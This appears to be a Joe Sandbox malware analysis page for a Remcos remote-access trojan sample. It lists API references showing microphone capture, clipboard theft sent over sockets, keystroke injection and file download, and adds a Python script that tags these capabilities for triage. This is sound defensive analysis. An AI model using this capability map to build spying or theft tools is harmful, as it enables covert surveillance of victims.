                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DecodePointer
                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                            • API String ID: 3527080286-3064271455
                                                                                                            • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                            • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                            • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                            • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                            • API String ID: 1462127192-2001430897
                                                                                                            • Opcode ID: c9e55723ecb2ee04230f435addb8f16ed6a8a05fe378bed3b576d9dff6fd58f4
                                                                                                            • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                            • Opcode Fuzzy Hash: c9e55723ecb2ee04230f435addb8f16ed6a8a05fe378bed3b576d9dff6fd58f4
                                                                                                            • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                            APIs
                                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                            • API String ID: 3809562944-3643129801
                                                                                                            • Opcode ID: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                                            • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                            • Opcode Fuzzy Hash: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                                            • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
• waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
• waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
• waveInStart.WINMM ref: 00401A81
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: XCG$`=G$x=G
• API String ID: 1356121797-903574159
• Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
• Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
• Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
• Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
• lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
• Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
• TranslateMessage.USER32(?), ref: 0041C9FB
• DispatchMessageA.USER32(?), ref: 0041CA05
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
• API String ID: 1970332568-165870891
• Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
• Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
• Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
• Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
• Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
• Opcode Fuzzy Hash: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
• Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
APIs
• GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
• __alloca_probe_16.LIBCMT ref: 00452C91
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
• __alloca_probe_16.LIBCMT ref: 00452D3B
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
• __freea.LIBCMT ref: 00452DAA
• __freea.LIBCMT ref: 00452DB6
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
• String ID:
• API String ID: 201697637-0
• Opcode ID: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
• Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
• Opcode Fuzzy Hash: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
• Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• _memcmp.LIBVCRUNTIME ref: 004446A3
• _free.LIBCMT ref: 00444714
• _free.LIBCMT ref: 0044472D
• _free.LIBCMT ref: 0044475F
• _free.LIBCMT ref: 00444768
• _free.LIBCMT ref: 00444774
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
• Opcode ID: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
• Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
• Opcode Fuzzy Hash: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
• Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
• Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
• Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
• Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
• Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
APIs
• ExitThread.KERNEL32 ref: 004017F4
  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
• waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
• __Init_thread_footer.LIBCMT ref: 004017BC
  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: T=G$p[G$>G$>G
• API String ID: 1596592924-2461731529
• Opcode ID: b033b66669596b249d1ce25b62a4281e1d13c05af68800beb23af724c3c7b6f6
• Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
• Opcode Fuzzy Hash: b033b66669596b249d1ce25b62a4281e1d13c05af68800beb23af724c3c7b6f6
• Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
• Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
• Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
• Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
• Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
APIs
  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
• _wcslen.LIBCMT ref: 0041A8F6
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCurrentOpenProcessQueryValue_wcslen
• String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
• API String ID: 37874593-703403762
• Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
• Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
• Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
• Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
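The function records in this dump list only raw API references and string identifiers, so the capabilities they imply have to be read out by hand: microphone capture through the waveIn* family, a tray icon set up next to the literal string "Remcos", a download written to a .part file and then renamed with MoveFileW, and a default-handler lookup under http\shell\open\command. The script below is an added example for this page and is not part of the Joe Sandbox report or of the analysed sample. It parses records in the layout shown here (bullet lines under "APIs", the "String ID" field with `$`-separated strings, and "Opcode ID" closing each record) and tags each function with capability rules defined in the script. Both the layout assumptions and the capability mapping are the editor's own, not Joe Sandbox signatures; the sample input is a constructed, abridged copy of four records from the page.

```python
"""Tag Joe Sandbox IDA-plugin function records with capabilities.

Added example for this report page; not Joe Sandbox code and not from the
analysed sample. Layout assumed from the dump on the page: API references
are bullets "Name.MODULE(args), ref: addr" (optionally prefixed with
"Part of subcall function X:"), "String ID" holds "$"-separated strings,
and "Opcode ID" closes a record. CAPABILITY_RULES is the editor's own map.
"""
import re
from dataclasses import dataclass, field

# Constructed input: abridged copies of four records from this report with
# indentation stripped, argument lists shortened and hash fields dropped.
SAMPLE_REPORT = """\
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
• waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E), ref: 00401A11
• waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
• waveInStart.WINMM ref: 00401A81
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: XCG$`=G$x=G
• Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
• lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
• Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
• String ID: Remcos
• Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002), ref: 00406C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00406C80
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• CloseHandle.KERNEL32(00000000), ref: 00406CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
• DeleteFileW.KERNEL32(00000000), ref: 00406D18
• String ID: .part
• Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
APIs
  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400), ref: 004125A6
  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA), ref: 004125C5
• _wcslen.LIBCMT ref: 0041A8F6
• String ID: .exe$:@$XCG$http\\shell\\open\\command$program files (x86)\\$program files\\
• Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
"""


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    apis: set = field(default_factory=set)      # API names, e.g. "waveInOpen"
    modules: set = field(default_factory=set)   # import modules, e.g. "WINMM"
    strings: list = field(default_factory=list)


API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)")
FIELD_LINE = re.compile(r"^\s*•\s*(API ID|String ID|Opcode ID):\s*(.*)$")


def parse_records(text: str) -> list:
    """Split report text into FunctionRecords; "Opcode ID" ends a record."""
    records, current = [], FunctionRecord()
    for line in text.splitlines():
        m = FIELD_LINE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            if key == "String ID":
                current.strings = [s for s in value.split("$") if s]
            elif key == "Opcode ID":
                current.opcode_id = value
                records.append(current)
                current = FunctionRecord()
            continue
        m = API_LINE.match(line)
        if m:
            current.apis.add(m.group(1))
            current.modules.add(m.group(2))
    return records


# Editor's capability mapping (assumption, not a Joe Sandbox signature):
# (label, APIs that must all appear, strings that must all appear).
CAPABILITY_RULES = [
    ("microphone-capture", {"waveInOpen", "waveInAddBuffer", "waveInStart"}, set()),
    ("tray-icon-named-remcos", {"Shell_NotifyIconA"}, {"Remcos"}),
    ("download-to-temp-then-rename", {"CreateFileW", "WriteFile", "MoveFileW"}, {".part"}),
    ("default-browser-lookup", {"RegOpenKeyExW", "RegQueryValueExW"}, {r"http\shell\open\command"}),
]


def classify(rec: FunctionRecord) -> list:
    """Labels of every rule whose API set and string set rec satisfies."""
    return [label for label, need_apis, need_strings in CAPABILITY_RULES
            if need_apis <= rec.apis and need_strings <= set(rec.strings)]


def triage(text: str) -> dict:
    """Map the first 12 hex digits of each hit's Opcode ID to its labels."""
    return {rec.opcode_id[:12]: labels
            for rec in parse_records(text) if (labels := classify(rec))}


if __name__ == "__main__":
    for opcode, labels in triage(SAMPLE_REPORT).items():
        print(opcode, ", ".join(labels))
```

Point `triage()` at a saved text copy of the full function listing instead of `SAMPLE_REPORT` to tag every record; hits are keyed by the leading hex digits of the Opcode ID so they map straight back to the records above. Rules are deliberately conjunctive (all listed APIs and strings must co-occur in one function) so that CRT helpers such as the MultiByteToWideChar wrappers in this dump do not produce hits.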
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
• __alloca_probe_16.LIBCMT ref: 004499E2
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
• __alloca_probe_16.LIBCMT ref: 00449AC7
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
• __freea.LIBCMT ref: 00449B37
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• __freea.LIBCMT ref: 00449B40
• __freea.LIBCMT ref: 00449B65
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
APIs
• SendInput.USER32 ref: 00418B08
• SendInput.USER32(00000001,?,0000001C), ref: 00418B30
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
• SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: InputSend$Virtual
• String ID:
• API String ID: 1167301434-0
APIs
• OpenClipboard.USER32 ref: 00415A46
• EmptyClipboard.USER32 ref: 00415A54
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID:
• API String ID: 2172192267-0
APIs
• _free.LIBCMT ref: 00447EBC
• _free.LIBCMT ref: 00447EE0
• _free.LIBCMT ref: 00448067
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
• WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
• WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
• _free.LIBCMT ref: 00448233
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
APIs
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• _free.LIBCMT ref: 00444086
• _free.LIBCMT ref: 0044409D
• _free.LIBCMT ref: 004440BC
• _free.LIBCMT ref: 004440D7
• _free.LIBCMT ref: 004440EE
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: _free$AllocateHeap
• String ID: J7D
• API String ID: 3033488037-1677391033
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
• __fassign.LIBCMT ref: 0044A180
• __fassign.LIBCMT ref: 0044A19B
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
• WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
• WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: _free
• String ID: HE$HE
• API String ID: 269201875-1978648262
APIs
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: CloseEnumInfoOpenQuerysend
• String ID: TUFTUF$>G$DG$DG
• API String ID: 3114080316-344394840
APIs
• _ValidateLocalCookies.LIBCMT ref: 00437AAB
• ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
• _ValidateLocalCookies.LIBCMT ref: 00437B41
• __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
• _ValidateLocalCookies.LIBCMT ref: 00437BC1
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
